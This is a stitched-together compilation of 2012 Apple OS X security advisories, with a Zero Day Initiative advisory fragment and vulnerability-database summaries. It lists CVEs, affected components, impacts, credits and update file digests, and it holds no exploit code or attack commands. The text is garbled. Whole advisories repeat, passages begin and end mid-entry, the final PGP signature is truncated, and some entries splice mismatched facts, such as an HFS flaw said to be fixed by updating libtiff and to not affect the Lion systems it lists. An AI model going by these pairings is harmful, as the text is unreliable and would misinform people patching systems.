OS X Lion systems. CVE-ID CVE-2012-0870 : Andy Davis of NGS Secure CVE-2012-1182 : An anonymous researcher working with HP's Zero Day Initiative Security Framework Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. CVE-ID CVE-2012-0662 : aazubel working with HP's Zero Day Initiative Time Machine Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may access a user's Time Machine backup credentials Description: The user may designate a Time Capsule or remote AFP volume attached to an AirPort Base Station to be used for Time Machine backups. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. X11 Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Applications that use libXfont to process LZW-compressed data may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libXfont's handling of LZW-compressed data. This issue is addressed by updating libXfont to version 1.4.4. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either Security Update 2012-002 or OS X v10.7.4. For OS X Lion v10.7.3 The download file is named: MacOSXUpd10.7.4.dmg Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36 For OS X Lion v10.7 and v10.7.2 The download file is named: MacOSXUpdCombo10.7.4.dmg Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f For OS X Lion Server v10.7.3 The download file is named: MacOSXServerUpd10.7.4.dmg Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2 For OS X Lion Server v10.7 and v10.7.2 The download file is named: MacOSXServerUpdCombo10.7.4.dmg Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240 For Mac OS X v10.6.8 The download file is named: SecUpd2012-002Snow.dmg Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-002.dmg Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPqtkzAAoJEGnF2JsdZQeee2MIAKAcBIY6k0LU2fDLThFoAgKh WkYpGmCwa7L6n02geHzWrUCK/P/0yGWzDDqLfKlKuKbXdEIRP2wZTlvrqZHLzNO/ nXgz3HN1Xbll8yVXrGMEsoTD23Q+2/ZKLGMlSDw3vgBTVi/g4Rcer4Eew5mTkaoA j4WkrzgVUIxCMrsWMMwu1SVaizBuTYbNVzCzV3JPF1H0zVtVKgwWjhTdOJ/RDksD sjZG1XIEqVyv1rNk5BtjxVPFaJGpf9mcHiH8XyKQ0bC6ToM2r3B++Layoc5k1K0V OxKGSfWOEbWi/KR6vlXyVbe7JnU7a/V0C25HXhnoMEtoTCleZACEByLVtBC87LU= =6Eiz -----END PGP SIGNATURE----- . Authentication is not required to exploit this vulnerability. The flaw exists within the libsecurity_cdsa_plugin which implements routines defined in libsecurity_cssm. The library defines an allocation routine as having an argument type uint32. The implemented methods in the cdsa_plugin accept parameter having type size_t, this value is truncated from 64 bits to 32 bits when being passed to the library routine. This can lead to an underallocated memory region and ultimately a write out of bounds. - -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT1222 - -- Disclosure Timeline: 2011-11-29 - Vulnerability reported to vendor 2012-08-17 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * aazubel - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUC5j51VtgMGTo1scAQJVbAf/eZ0SlfaZYtTyV0Iy6YUeeOD9mcRc3pHU 2A1qvoQryl5xDHvLh+m/iZZ+a3oQb8AtqWwRfZb4qpXA3cXIbd+qOtCU3yYX3oso 5h9Ag8iAbn79P+tMoWu0d6iwJIuw4RHMeoNtSnQ+Lzl8lwfJo7OItIaoXKEgiydS jTv69en5X65Fni0ofsXvKrZ4lu/PBZahhegy1Jd/5LmGCLTp6hRlhlhjmSD2CPBg yBYfQy844mfupGBSkgkUsjCt8kMJn0iDwW+NldfRGkxKUynoxCMV4C0shXe7lkfs x8ZDEe/7xy6R7+Qk/PBusKfBwWUfV2ns03EUTpgibKQxa+4wsu0uGw== =nb/B -----END PGP SIGNATURE-----

Buffer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted audio sample tables in a movie file that is progressively downloaded. Apple Mac OS X is prone to a buffer overflow vulnerability that affects the QuickTime component. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002 OS X Lion v10.7.4 and Security Update 2012-002 is now available and addresses the following: Login Window Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3 Impact: Remote admins and persons with physical access to the system may obtain account information Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. CVE-ID CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State University, Paul Nelson Bluetooth Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A local user may be able to execute arbitrary code with system privileges Description: A temporary file race condition issue existed in blued's initialization routine. CVE-ID CVE-2012-0649 : Aaron Sigel of vtty.com curl Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. curl disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling empty fragments. CVE-ID CVE-2011-3389 : Apple curl Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Using curl or libcurl with a maliciously crafted URL may lead to protocol-specific data injection attacks Description: A data injection issue existed in curl's handling of URLs. This issue is addressed through improved validation of URLs. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0036 Directory Service Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: A remote attacker may obtain sensitive information Description: Multiple issues existed in the directory server's handling of messages from the network. By sending a maliciously crafted message, a remote attacker could cause the directory server to disclose memory from its address space, potentially revealing account credentials or other sensitive information. This issue does not affect OS X Lion systems. The Directory Server is disabled by default in non-server installations of OS X. CVE-ID CVE-2012-0651 : Agustin Azubel HFS Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Mounting a maliciously crafted disk image may lead to a system shutdown or arbitrary code execution Description: An integer underflow existed in the handling of HFS catalog files. This issue does not affect OS X Lion systems. This issue is addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 Kernel Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: When FileVault is used, the disk may contain unencrypted user data Description: An issue in the kernel's handling of the sleep image used for hibernation left some data unencrypted on disk even when FileVault was enabled. This issue is addressed through improved handling of the sleep image, and by overwriting the existing sleep image when updating to OS X v10.7.4. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3212 : Felix Groebert of Google Security Team libarchive Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in the handling of tar archives and iso9660 files. CVE-ID CVE-2011-1777 CVE-2011-1778 libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Verifying a maliciously crafted X.509 certificate, such as when visiting a maliciously crafted website, may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of X.509 certificates. CVE-ID CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme Prado of Conselho da Justica Federal, Ryan Sleevi of Google libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Support for X.509 certificates with insecure-length RSA keys may expose users to spoofing and information disclosure Description: Certificates signed using RSA keys with insecure key lengths were accepted by libsecurity. This issue is addressed by rejecting certificates containing RSA keys less than 1024 bits. CVE-ID CVE-2012-0655 libxml Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple vulnerabilities existed in libxml, the most serious of which may lead to an unexpected application termination or arbitrary code execution. These issues are addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla LoginUIFramework Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: If the Guest user is enabled, a user with physical access to the computer may be able to log in to a user other than the Guest user without entering a password Description: A race condition existed in the handling of Guest user logins. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0656 : Francisco Gomez (espectalll123) PHP Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Multiple vulnerabilities in PHP Description: PHP is updated to version 5.3.10 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-4566 CVE-2011-4885 CVE-2012-0830 Quartz Composer Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A user with physical access to the computer may be able to cause Safari to launch if the screen is locked and the RSS Visualizer screen saver is used Description: An access control issue existed in Quartz Composer's handling of screen savers. This issue is addressed through improved checking for whether or not the screen is locked. CVE-ID CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of MPEG files. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: A buffer underflow existed in the handling of MPEG files. This issue does not affect systems prior to OS X Lion. By sending a maliciously crafted packet, an unauthenticated remote attacker could cause a denial of service or arbitrary code execution with system privileges. These issues do not affect OS X Lion systems. CVE-ID CVE-2012-0870 : Andy Davis of NGS Secure CVE-2012-1182 : An anonymous researcher working with HP's Zero Day Initiative Security Framework Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. CVE-ID CVE-2012-0662 : aazubel working with HP's Zero Day Initiative Time Machine Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may access a user's Time Machine backup credentials Description: The user may designate a Time Capsule or remote AFP volume attached to an AirPort Base Station to be used for Time Machine backups. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. X11 Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Applications that use libXfont to process LZW-compressed data may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libXfont's handling of LZW-compressed data. This issue is addressed by updating libXfont to version 1.4.4. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either Security Update 2012-002 or OS X v10.7.4. For OS X Lion v10.7.3 The download file is named: MacOSXUpd10.7.4.dmg Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36 For OS X Lion v10.7 and v10.7.2 The download file is named: MacOSXUpdCombo10.7.4.dmg Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f For OS X Lion Server v10.7.3 The download file is named: MacOSXServerUpd10.7.4.dmg Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2 For OS X Lion Server v10.7 and v10.7.2 The download file is named: MacOSXServerUpdCombo10.7.4.dmg Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240 For Mac OS X v10.6.8 The download file is named: SecUpd2012-002Snow.dmg Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-002.dmg Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPqtkzAAoJEGnF2JsdZQeee2MIAKAcBIY6k0LU2fDLThFoAgKh WkYpGmCwa7L6n02geHzWrUCK/P/0yGWzDDqLfKlKuKbXdEIRP2wZTlvrqZHLzNO/ nXgz3HN1Xbll8yVXrGMEsoTD23Q+2/ZKLGMlSDw3vgBTVi/g4Rcer4Eew5mTkaoA j4WkrzgVUIxCMrsWMMwu1SVaizBuTYbNVzCzV3JPF1H0zVtVKgwWjhTdOJ/RDksD sjZG1XIEqVyv1rNk5BtjxVPFaJGpf9mcHiH8XyKQ0bC6ToM2r3B++Layoc5k1K0V OxKGSfWOEbWi/KR6vlXyVbe7JnU7a/V0C25HXhnoMEtoTCleZACEByLVtBC87LU= =6Eiz -----END PGP SIGNATURE-----

Login Window in Apple Mac OS X 10.7.3, when Legacy File Vault or networked home directories are enabled, does not properly restrict what is written to the system log for network logins, which allows local users to obtain sensitive information by reading the log. Apple Mac OS X is prone to a local security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive account information. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. By sending a maliciously crafted message, a remote attacker could cause the directory server to disclose memory from its address space, potentially revealing account credentials or other sensitive information. By sending a maliciously crafted packet, an unauthenticated remote attacker could cause a denial of service or arbitrary code execution with system privileges. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. Further information is available via the Apache web site at http://httpd.apache.org/. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3368 CVE-2011-3607 CVE-2011-4317 CVE-2012-0021 CVE-2012-0031 CVE-2012-0053 BIND Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: A remote attacker may be able to cause a denial of service in systems configured to run BIND as a DNS nameserver Description: A reachable assertion issue existed in the handling of DNS records. This issue was addressed by updating to BIND 9.7.6-P1. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-4313 BIND Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4, OS X Mountain Lion v10.8 and v10.8.1 Impact: A remote attacker may be able to cause a denial of service, data corruption, or obtain sensitive information from process memory in systems configured to run BIND as a DNS nameserver Description: A memory management issue existed in the handling of DNS records. This issue was addressed by updating to BIND 9.7.6-P1 on OS X Lion systems, and BIND 9.8.3-P1 on OS X Mountain Lion systems. CVE-ID CVE-2012-1667 CoreText Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Applications that use CoreText may be vulnerable to an unexpected application termination or arbitrary code execution Description: A bounds checking issue existed in the handling of text glyphs, which may lead to out of bounds memory reads or writes. This issue was addressed through improved bounds checking. CVE-ID CVE-2012-3716 : Jesse Ruderman of Mozilla Corporation Data Security Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4, OS X Mountain Lion v10.8 and v10.8.1 Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information Description: TrustWave, a trusted root CA, has issued, and subsequently revoked, a sub-CA certificate from one of its trusted anchors. This sub-CA facilitated the interception of communications secured by Transport Layer Security (TLS). This update adds the involved sub-CA certificate to OS X's list of untrusted certificates. DirectoryService Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: If the DirectoryService Proxy is used, a remote attacker may cause a denial of service or arbitrary code execution Description: A buffer overflow existed in the DirectoryService Proxy. This issue was addressed through improved bounds checking. This issue does not affect OS X Lion and Mountain Lion systems. CVE-ID CVE-2012-0650 : aazubel working with HP's Zero Day Initiative ImageIO Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in libpng's handling of PNG images. These issues were addressed through improved validation of PNG images. These issues do not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3026 : Juri Aedla CVE-2011-3048 ImageIO Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow issue existed in libTIFF's handling of TIFF images. This issue was addressed through improved validation of TIFF images. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-1173 : Alexander Gavrun working with HP's Zero Day Initiative Installer Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Remote admins and persons with physical access to the system may obtain account information Description: The fix for CVE-2012-0652 in OS X Lion 10.7.4 prevented user passwords from being recorded in the system log, but did not remove the old log entries. This issue was addressed by deleting log files that contained passwords. CVE-ID CVE-2012-0652 International Components for Unicode Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in the handling of ICU locale IDs. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-4599 Kernel Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: A malicious program could bypass sandbox restrictions Description: A logic issue existed in the handling of debug system calls. This may allow a malicious program to gain code execution in other programs with the same user privileges. This issue was addressed by disabling handling of addresses in PT_STEP and PT_CONTINUE. This issue does not affect OS X Mountain Lion systems. This issue was addressed by preventing user-installed methods from being used when the system is handling login information. CVE-ID CVE-2012-3718 : An anonymous researcher Mail Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing an e-mail message may lead to execution of web plugins Description: An input validation issue existed in Mail's handling of embedded web plugins. This issue was addressed by disabling third- party plug-ins in Mail. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3719 : Will Dormann of the CERT/CC Mobile Accounts Available for: OS X Mountain Lion v10.8 and v10.8.1 Impact: A user with access to the contents of a mobile account may obtain the account password Description: Creating a mobile account saved a hash of the password in the account, which was used to login when the mobile account was used as an external account. The password hash could be used to determine the user's password. This issue was addressed by creating the password hash only if external accounts are enabled on the system where the mobile account is created. CVE-ID CVE-2012-3720 : Harald Wagener of Google, Inc. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2012-0831 CVE-2012-1172 CVE-2012-1823 CVE-2012-2143 CVE-2012-2311 CVE-2012-2386 CVE-2012-2688 PHP Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: PHP scripts which use libpng may be vulnerable to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of PNG files. This issue was addressed by updating PHP's copy of libpng to version 1.5.10. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3048 Profile Manager Available for: OS X Lion Server v10.7 to v10.7.4 Impact: An unauthenticated user could enumerate managed devices Description: An authentication issue existed in the Device Management private interface. This issue was addressed by removing the interface. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3721 : Derick Cassidy of XEquals Corporation QuickLook Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted .pict file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of .pict files. This issue was addressed through improved validation of .pict files. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0671 : Rodrigo Rubira Branco (twitter.com/bsdaemon) from the Qualys Vulnerability & Malware Research Labs (VMRL) QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in QuickTime's handling of sean atoms. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0670 : Tom Gallagher (Microsoft) and Paul Bates (Microsoft) working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access existed in the handling of Sorenson encoded movie files. This issue was addressed through improved memory initialization. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3722 : Will Dormann of the CERT/CC QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of RLE encoded movie files. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0668 : Luigi Auriemma working with HP's Zero Day Initiative Ruby Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. The Ruby OpenSSL module disabled the 'empty fragment' countermeasure which prevented these attacks. This issue was addressed by enabling empty fragments. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3389 USB Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Attaching a USB device may lead to an unexpected system termination or arbitrary code execution Description: A memory corruption issue existed in the handling of USB hub descriptors. This issue was addressed through improved handling of the bNbrPorts descriptor field. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3723 : Andy Davis of NGS Secure Note: OS X Mountain Lion v10.8.2 includes the content of Safari 6.0.1. For further details see "About the security content of Safari 6.0.1" at http://http//support.apple.com/kb/HT5502 OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and Security Update 2012-004 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 or Security Update 2012-004. For OS X Mountain Lion v10.8.1 The download file is named: OSXUpd10.8.2.dmg Its SHA-1 digest is: d6779e1cc748b78af0207499383b1859ffbebe33 For OS X Mountain Lion v10.8 The download file is named: OSXUpdCombo10.8.2.dmg Its SHA-1 digest is: b08f10233d362e39f20b69f91d1d73f5e7b68a2c For OS X Lion v10.7.4 The download file is named: MacOSXUpd10.7.5.dmg Its SHA-1 digest is: e0a9582cce9896938a7a541bd431862d93893532 For OS X Lion v10.7 and v10.7.3 The download file is named: MacOSXUpdCombo10.7.5.dmg Its SHA-1 digest is: f7a26b164fa10dae4fe646e57b01c34a619c8d9b For OS X Lion Server v10.7.4 The download file is named: MacOSXServerUpd10.7.5.dmg Its SHA-1 digest is: a891b03bfb4eecb745c0c39a32f39960fdb6796a For OS X Lion Server v10.7 and v10.7.3 The download file is named: MacOSXServerUpdCombo10.7.5.dmg Its SHA-1 digest is: df6e1748ab0a3c9e05c890be49d514673efd965e For Mac OS X v10.6.8 The download file is named: SecUpd2012-004.dmg Its SHA-1 digest is: 5b136e29a871d41012f0c6ea1362d6210c8b4fb7 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-004.dmg Its SHA-1 digest is: 9b24496be15078e58a88537700f2f39c112e3b28 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJQWhlbAAoJEPefwLHPlZEwwjwQAKrpQlZh1B2mkSTLxR7QZg6e 